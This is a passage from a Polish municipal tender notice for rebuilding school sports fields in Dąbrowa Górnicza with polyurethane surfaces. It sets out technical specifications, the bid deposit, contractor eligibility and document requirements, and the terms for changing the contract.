 o wysięgu 1,60 m, wyposażone w tablice stalowe ażurowe, cynkowane o wymiarach   1,05x1,80 m z obejmą wzmocnioną cynkowaną i siatką łańcuszkową. Stojaki montowane zgodnie z zaleceniami producenta.
- 3 komplety słupków do siatkówki, uniwersalnych  ( siatkówka badminton) aluminiowych o profilu owalnym, z mechanizmem naciągu i regulacji wysokości siatki, montowanych w tulejach z możliwością demontażu i zaślepienia tulei deklami o nawierzchni tożsamej z nawierzchnią boiska, wyposażone w siatki turniejowe z antenkami wzmocnione taśmą z czterech stron (9.0x1.0 m) w kolorze białym 
( produkt typowy ). Słupki montowane zgodnie z zaleceniami producenta.
- siatka do badmintona ( 6,10 x 0,76 m) w kolorze białym (produkt typowy )
ZADANIE D:
Modernizacja obiektów sportowych przy obiektach oświatowych w celu propagowania zdrowego stylu życia  - boisko wielofunkcyjne  na terenie ZS nr 1 przy   ul. Konopnickiej w Dąbrowie Górniczej
Przedmiotem zamówienia jest :     Opracowanie dokumentacji projektowej na podstawie Programu Funkcjonalno - Użytkowego i wykonanie robót budowlanych tj; 
Przebudowa istniejącego boiska wielofunkcyjnego o wymiarach 28,80x48,80m z nawierzchnią asfaltową ograniczoną obrzeżami betonowymi 8x30 cm. Przebudowa boiska będzie polegała na wykonaniu nowej nawierzchni poliuretanowej, na części istniejącego boiska asfaltowego (po uprzednim przygotowaniu istniejącej nawierzchni asfaltowej), oraz wykonaniu piłkochwytu  o wysokości h=4,0 m wzdłuż boiska wraz z wykonaniem dokumentacji projektowej. 
Zagospodarowanie terenu istniejącego boiska obejmuje 
1. boisko wielofunkcyjne  o pow. 460,80 m 2 do gry w piłkę koszykową i piłkę 
    siatkową o nawierzchni syntetycznej poliuretanowej, 
2. piłkochwyt o wysokości h = 4,0 m  po jednej dłuższej stronie  boiska  
3. mała architektura : 4 ławki parkowe, 2 kosze na śmieci,
4. odwodnienie boiska,
5. zieleń.
Parametry techniczne przebudowywanego obiektu. 
 boisko wielofunkcyjne; boisko do  piłki koszykowej i piłki siatkowej o
  wymiarach 28,80  x 16,00 m o nawierzchni syntetycznej poliuretanowej w 
  kolorze ceglastym, zielonym i żółtym , mieszczące w swym obrysie:
- boisko do piłki koszykowej o wymiarach 26,00 x 14,00 m,  boisko wydzielone 
  liniami szer. 5 cm w kolorze białym lub niebieskim,
- boisko do siatkówki o wymiarach 9,00 x 18,00 m, boisko wydzielone liniami  
  szer. 5 cm w kolorze żółtym,
piłkochwyt; (na długości boiska ) należy zamontować piłkochwyt 
   o długości 28,80  m  i wysokości  h=4,00 m,  piłkochwyty systemowe 
    z siatki polipropylenowej na słupach stalowych w rozstawie zgodnym 
    z rysunkiem konstrukcyjnym. 
    Słupy stalowe z profilu zamkniętego 80 x 80 x 3 mm, cynkowane
    i malowane  proszkowo. Słupy skrajne rozparte zastrzałami z profilu                 
    60 x 60 x 3 mm. Siatka polipropylenowa o oczkach 10 x10 cm o 
    gr. 4,75 mm. Siatka rozpięta na linkach stalowych cynkowanych gr. 4 mm.
    Słupy  montować   w fundamentach betonowych  B - 20  o wymiarach O 300 x 1100 mm.
ławki parkowe, kosze na śmieci; po obu krótszych bokach boiska należy zamontować  4 ławki parkowe bez oparcia o konstrukcji rurowej z  siedziskami drewnianymi oraz 2 kosze na śmieci umieszczone między  ławkami. Ławki i kosze montowane na stałe w podłożu.
Odwodnienie:  odwodnienie nawierzchni boisk odbywało się będzie w sposób naturalny poprzez wyprofilowanie spadków płyty boisk rzędu 0,5% ze sprowadzeniem wody na tereny zieleni.
Ukształtowanie terenu: elementy zagospodarowania należy ukształtować w nawiązaniu do istniejącego boiska asfaltowego i terenu otaczającego.
Zieleń: fragmenty terenu wolne od zabudowy  i nawierzchni utwardzonych, a zniszczonych  poprzez prowadzenie  robót budowlanych należy odtworzyć poprzez zazielenienie trawnikami wykonanymi metodą siewu. 
Nawierzchnia boisk;
Nawierzchnia boisk syntetyczna poliuretanowa w kolorze ceglastym, zielonym i żółtym. Linie segregacyjne poszczególnych boisk szer. 5 cm malowane farbą systemową poliuretanową w następujących kolorach : boisko do piłki koszykowej  w kolorze białym lub niebieskim, boisko do siatkówki w kolorze żółtym. Boisko wyposażone w  stojaki do koszykówki o wysięgu 1,60 m i słupki do siatkówki z mechanizmem naciągowym i możliwością regulacji wysokości siatki.
Rozwiązania konstrukcyjno-materiałowe podbudów i nawierzchni  urządzeń sportowych.- boisko wielofunkcyjne
Stan istniejącej nawierzchni asfaltowej boiska daje możliwość wykorzystania jej jako podbudowy pod nową nawierzchnię syntetyczną.
Istniejącą podbudowę asfaltobetonową należy przygotować wg. następującej  technologii :
- usunąć luźne fragmenty asfaltobetonu z powierzchni  podbudowy, rys i spękań,
- istniejące nieliczne ubytki asfaltu uzupełnić betonem B-20 na pełną grubość asfaltobetonu, 
- sfrezować istniejącą podbudowę asfaltobetonową na gr 5 mm, oczyścić przed układaniem kolejnych warstw podbudowy
- na całej powierzchni wylać płytę betonową z betonu B-25  o gr. min 10 cm,
  z odpowiednimi spadkami rzędu 0,5 %, płytę ograniczyć nowymi obrzeżami 
  betonowymi 8 x 30 cm, po  uprzednim demontażu starych
-  podbudowa betonowa zatarta na ostro,  zdylatowana ( zgodnie ze sztuka 
  budowlana), wysezonowana - wilgotność rzędu 3-5 %
Na tak przygotowanej podbudowie wykonać nową nawierzchnię syntetyczną   poliuretanową, dwuwarstwową typu natryskowego, składającą się z maty elastomerowej gr.~10 mm oraz poliuretanowego natrysku gr. ~3 mm, w kolorze ceglastym, zielonym  i żółtym. 
Obiekt należy  wyposażyć w następujący sprzęt sportowy :
- dwa stojaki do koszykówki, stalowe cynkowane, montowane w tulei,
 o wysięgu 1,60 m, wyposażone w tablice stalowe ażurowe, cynkowane o wymiarach 1,05x1,80 m z obejmą wzmocnioną cynkowaną i siatką łańcuszkową.   Stojaki wyposażone w osłony słupów.   Stojaki montowane zgodnie z zaleceniami producenta.
- jeden komplet słupków do siatkówki, aluminiowych o profilu owalnym, z mechanizmem naciągu i regulacji wysokości siatki, montowanych w tulejach z możliwością demontażu i zaślepienia tulei deklami o nawierzchni tożsamej z nawierzchnią boiska, wyposażone w siatki turniejowe z antenkami wzmocnione taśmą z czterech stron (9.0 x 1.0 m) w kolorze białym ( produkt typowy ). Słupki montowane zgodnie z zaleceniami producenta.
ZADANIE E(...) ZADANIE F(...).</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.00-8, 45.11.12.00-0, 45.23.24.52-5, 45.21.22.21-1, 45.34.20.00-6, 45.11.27.00-2, 45.23.32.22-1, 45.11.12.00-0, 71.32.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 90.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wykonawca przystępujący do przetargu jest zobowiązany wnieść wadium w wysokości 45.000,00 zł (słownie: czterdzieści pięć tysięcy złotych) w formach określonych w art. 45 ust. 6 Ustawy.
2.   Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek Zamawiającego:
Getin Noble Bank S.A. - konto nr 57 1560 0013 2002 3620 7000 0049.
3. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym     z uwzględnieniem art. 46 ust.4 Ustawy. 
Wskazane jest dołączenie do oferty kopii polecenia przelewu potwierdzonej przez Wykonawcę.
4. W przypadku wyboru formy niepieniężnej wadium, oryginał dokumentu należy złożyć w Wydziale Księgowo-Budżetowym Urzędu Miejskiego w Dąbrowie Górniczej ul. Graniczna pokój nr 320, III piętro. Wskazane jest dołączenie do oferty kserokopii złożonego dokumentu. 
5.   Zwrot wadium - zgodnie z art. 46 ust. 1, 1a, 2 i 4  Ustawy.
6.   Zatrzymanie wadium - zgodnie z art. 46 ust. 4a i 46 ust. 5 Ustawy.
7. Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podstawie art. 46 ust. 1 Ustawy, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez zamawiającego.
8.  Wykonawcy, którzy nie wniosą wadium do upływu terminu składania ofert, na przedłużony okres związania ofertą lub w terminie, o którym mowa w art. 46 ust.3 Ustawy, albo nie zgodzili się na przedłużenie okresu związania ofertą zostaną wykluczeni z postępowania (art. 24 ust. 2 pkt. 2 Ustawy)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia o spełnieniu wymagań określonych  w art. 22 ust. 1 Ustawy - załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie wykonał zgodnie z zasadami sztuki budowlanej  i prawidłowo ukończył roboty budowlane polegające na  budowie, przebudowie lub rozbudowie:
-  minimum 2 obiektów sportowych, z których każdy składał się z boiska wielofunkcyjnego o pow. min. 1200 m2, wykonanego w technologii nawierzchni natryskowej z warstwą użytkową  w min. trzech kolorach wraz robotami towarzyszącymi - wartość  każdej z w/w robót budowlanych min. 450 000,00 zł  brutto; 
- minimum 2 obiektów sportowych w systemie Zaprojektuj i wybuduj -(tj. wykonanie dokumentacji projektowej wraz z realizacją robót budowlanych), z których każdy składał się z boiska wielofunkcyjnego o pow. min. 800 m2, wykonanego w technologii nawierzchni natryskowej  z warstwą użytkową  w min. trzech kolorach wraz robotami towarzyszącymi - wartość każdej z w/w robót budowlanych: minimum 300 000,00 zł brutto. 

Uwaga: 
1.	Jeżeli zakres robót przedstawionych w dokumencie złożonym na  potwierdzenie, że roboty budowlane zostały wykonane w sposób należyty oraz zgodnie z zasadami sztuki budowlanej i prawidłowo  ukończone jest szerszy od powyżej określonego przez Zamawiającego należy w wykazie robót budowlanych wyodrębnić zakres robót odpowiadających  wymaganemu w pkt. 8.1.2. SIWZ. 
2.	Równowartość w złotych zadań rozliczanych w walutach obcych zostanie określona według średniego kursu złotego w stosunku do walut obcych ogłoszonego przez NBP obowiązującego  w dniu,   w którym  zamieszczono ogłoszenie o niniejszym postępowaniu w Biuletynie Zamówień Publicznych</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia o spełnieniu wymagań określonych  w art. 22 ust. 1 Ustawy - załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje przynajmniej 1 osobą posiadająca uprawnienia do kierowania robotami w specjalności konstrukcyjno - budowlanej   oraz  1 osobą posiadającą  uprawnienia  budowlane  w zakresie  projektowania w specjalności  architektonicznej i 1 osobą posiadającą uprawnienia  budowlane  w zakresie  projektowania w specjalności konstrukcyjno -budowlanej  zgodnie  z Rozporządzeniem Ministra Transportu  i Budownictwa z dnia 28.04.2006 w sprawie samodzielnych funkcji technicznych w budownictwie Dz. U. z 2006r., Nr 83, poz. 578 z późn. zm.) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie  wcześniej obowiązujących przepisów. 
Zamawiający dopuszcza posiadanie przez 1 osobę więcej niż jednego z ww. uprawnień</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że:
1.  posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż  1 000 000,00 zł.
2. posiada środki finansowe lub zdolność kredytową w wysokości co najmniej 1 500 000, 00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Obowiązek wskazania przez Wykonawcę w wykazie oraz złożenia dowodów dotyczy robót budowlanych pozwalających wykazać, iż Wykonawca spełnia warunek określony w pkt. 8.1.2. SIWZ.  W wykazie nie należy podawać informacji o robotach budowlanych niewykonanych lub wykonanych nienależycie - Zamawiający nie ocenia zdolności Wykonawcy do należytego wykonania zamówienia na podstawie art. 22 ust. 5 Ustawy (zdanie 2);</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Oświadczenia lub dokumenty potwierdzające spełnianie przez oferowane dostawy, usługi lub roboty budowlane wymagań określonych przez Zamawiającego:
1. raport z badań sporządzony przez laboratorium badające nawierzchnie sportowe (np. Labosport, ISA Sport, itp.) akredytowane przez IAAF potwierdzający zgodność oferowanych parametrów z wymogami IAAF,
2. atest PZH dla nawierzchni lub dokument równoważny,
3. certyfikat IAAF first class dla obiektu wykonanego z oferowanej nawierzchni
4. badania ekologiczne na zgodność z DIN V 18035-6,wydane przez akredytowane przez IAAF laboratorium
5. autoryzacja producenta nawierzchni  wystawiona w oryginale dla wykonawcy na realizowaną inwestycję wraz z potwierdzeniem gwarancji udzielonej przez producenta na tę nawierzchnię
6. aprobata techniczna ITB lub rekomendacja techniczna ITB lub dokument równoważny, potwierdzający wszystkie parametry  techniczne oferowanej nawierzchni wymagane przez Zamawiającego
7. aktualny certyfikat IAAF dla oferowanej nawierzchni
8. karta techniczna nawierzchni potwierdzona przez producenta systemu
9. próbka nawierzchni z metryczką producenta</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. formularz ofertowy - załącznik nr 1 do SIWZ (wskazana data podpisania);
2. potwierdzenie wniesienia wadium;
3.pełnomocnictwo do reprezentowania Wykonawcy - jeżeli zostało ustanowione bądź do reprezentowania Wykonawców wspólnie ubiegających się o zamówienie przedłożone w formie oryginału lub kopii poświadczonej przez notariusza (dotyczy również spółki cywilnej);
4.  w przypadku, gdy Wykonawca będzie  polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków  zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia - zgodnie z art. 26 ust. 2b Ustawy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Jakość oferowanego systemu nawierzchni poliuretanowej - 40</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>I. Zamawiający przewiduje  możliwość dokonania istotnych zmian  postanowień zawartej umowy w  stosunku do treści  oferty, na podstawie której  dokonano wyboru Wykonawcy, w zakresie:
1.zmiany terminu wykonania zamówienia  w następujących przypadkach:
1.1.wystąpienia siły wyższej. Siła wyższa oznacza wydarzenie nieprzewidywalne i poza kontrolą stron niniejszej umowy, występujące po podpisaniu umowy, a powodujące niemożliwość wywiązania się z umowy w jej obecnym brzmieniu, lub inne okoliczności niezależne od Zamawiającego, w tym takie, których Zamawiający przy zachowaniu należytej staranności nie był w stanie uniknąć lub przewidzieć, wystąpienia nietypowych dla klimatu polskiego warunków atmosferycznych uniemożliwiających prowadzenie robót budowlanych zgodnie z technologią ich wykonywania, np. gradobicia, trąby powietrzne, zjawiska niestandardowe w klimacie polskim,
1.2. zmiany przepisów prawa Unii Europejskiej lub prawa krajowego, co powoduje konieczność dostosowania dokumentacji do zmiany przepisów, które nastąpiły w trakcie realizacji zamówienia, 
2. w pozostałym zakresie zmiany do umowy mogą dotyczyć następujących  okoliczności:
2.1. wydłużenia terminu gwarancji w związku z przedłużeniem terminu realizacji zamówienia lub zadeklarowaniem dłuższego terminu gwarancji przez producenta , 
2.2. poprawy jakości lub innych parametrów charakterystycznych dla danego elementu robót budowlanych, dostaw lub zmiana technologii,
2.3. aktualizacją rozwiązań projektowych z uwagi na postęp technologiczny bądź zmiany obowiązujących przepisów,
2.4. zmiany przepisów prawa istotnych dla postanowień zawartej umowy, 
2.5. zmiany Kierownika Budowy  Wykonawcy na skutek zdarzeń losowych, zmian kadrowo- personalnych, utraty wymaganych uprawnień, utraty stanowiska  z zastrzeżeniem równoważności uprawnień,
2.6. zmiany Podwykonawców na zasobach, których Wykonawca opierał się wykazując spełnianie warunków udziału w postępowaniu pod warunkiem , że nowy Podwykonawca  wykaże spełnianie warunków w zakresie nie mniejszym niż wskazany na etapie postępowania o zamówienie publiczne dotychczasowy Podwykonawca,
2.7. W przypadku zwiększenia  stawki podatku  VAT: Cena ryczałtowa  netto nie może być wyższa niż zadeklarowana w ofercie. Wartość wynagrodzenia ryczałtowego brutto nie ulegnie zmianie  w okresie obowiązywania umowy.
2.8. W przypadku zmniejszenia stawki podatku  VAT:  Cena ryczałtowa netto nie może być wyższa niż zadeklarowana w ofercie. Wartość  wynagrodzenia brutto zostanie pomniejszona z odpowiednim  zastosowaniem zmniejszonej stawki podatku VAT.
II.  W przypadku wystąpienia okoliczności skutkujących koniecznością zmiany umowy przyczyn, o których mowa w pkt. I Wykonawca zobowiązany jest do   niezwłocznego poinformowania o tym fakcie Zamawiającego i wystąpienia z wnioskiem o dokonanie wskazanej zmiany.   
III. Z okoliczności stanowiących podstawę zmiany do umowy zostanie sporządzony protokół  podpisany przez obie strony.
IV.  Zmiana umowy powinna nastąpić w formie pisemnego aneksu podpisanego przez obie  strony, pod rygorem nieważności takiego oświadczenia oraz powinna zawierać  uzasadnienie faktyczne i prawne.
V. Zmiana do umowy w sprawie zamówienia publicznego bez zachowania formy pisemnej jest dotknięta sankcją nieważności, a więc nie wywołuje skutków prawnych.
VI.Pozostałe kwestie odnoszące się do umowy uregulowane są w załączniku nr 7 do SIWZ -  projekt umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.dabrowa-gornicza.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Dąbrowie Górniczej, ul. Graniczna 21, Wydział Gospodarki Komunalnej i Mieszkaniowej, III piętro, pokój nr 316.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.07.2014 godzina 09:30, miejsce: Urząd  Miejski w Dąbrowie Górniczej, ul. Graniczna 21, parter, stanowisko nr 13 - INFORMACJA.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zamówienie nie jest finansowane ze środków Unii Europejskiej. 
2. Pełne brzmienie sekcji II.1.1) Nazwa nadana zamówieniu przez zamawiającego: Wykonanie robót dotyczących boisk o nawierzchni poliuretanowej:
ZADANIE A:
Modernizacja obiektów sportowych przy obiektach oświatowych w celu propagowania zdrowego stylu życia - boisko wielofunkcyjne  na terenie SP NR 3 przy  ul. Mireckiego w Dąbrowie Górniczej
ZADANIE B:
Modernizacja obiektów komunalnych infrastruktury  sportowej w celu propagowania zdrowego stylu życia -  boisko wielofunkcyjne na terenie SP NR 8 przy ul. Krasińskiego 34 w Dąbrowie Górniczej
ZADANIE C:
Modernizacja obiektów sportowych przy obiektach oświatowych w celu propagowania zdrowego stylu życia -  boisko do piłki nożnej, boisko wielofunkcyjne na terenie SP NR 18 ul. Piłsudskiego 73  oraz Boisko do siatkówki w Gołonogu w Dąbrowie Górniczej
ZADANIE D:
Modernizacja obiektów sportowych przy obiektach oświatowych w celu propagowania zdrowego stylu życia  - boisko wielofunkcyjne  na terenie ZS nr 1 przy   ul. Konopnickiej w Dąbrowie Górniczej
ZADANIE E: 
 Boisko sportowe dla dzieci i młodzieży  
 ZADANIE F:
Budowa  boiska do koszykówki obok placu zabaw.
3. Ciąg dalszy sekcji II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:
ZADANIE E: 
Boisko sportowe dla dzieci i młodzieży  
Przedmiotem zamówienia jest: Opracowanie dokumentacji projektowej na podstawie Programu Funkcjonalno - Użytkowego i wykonanie robót budowlanych tj; 
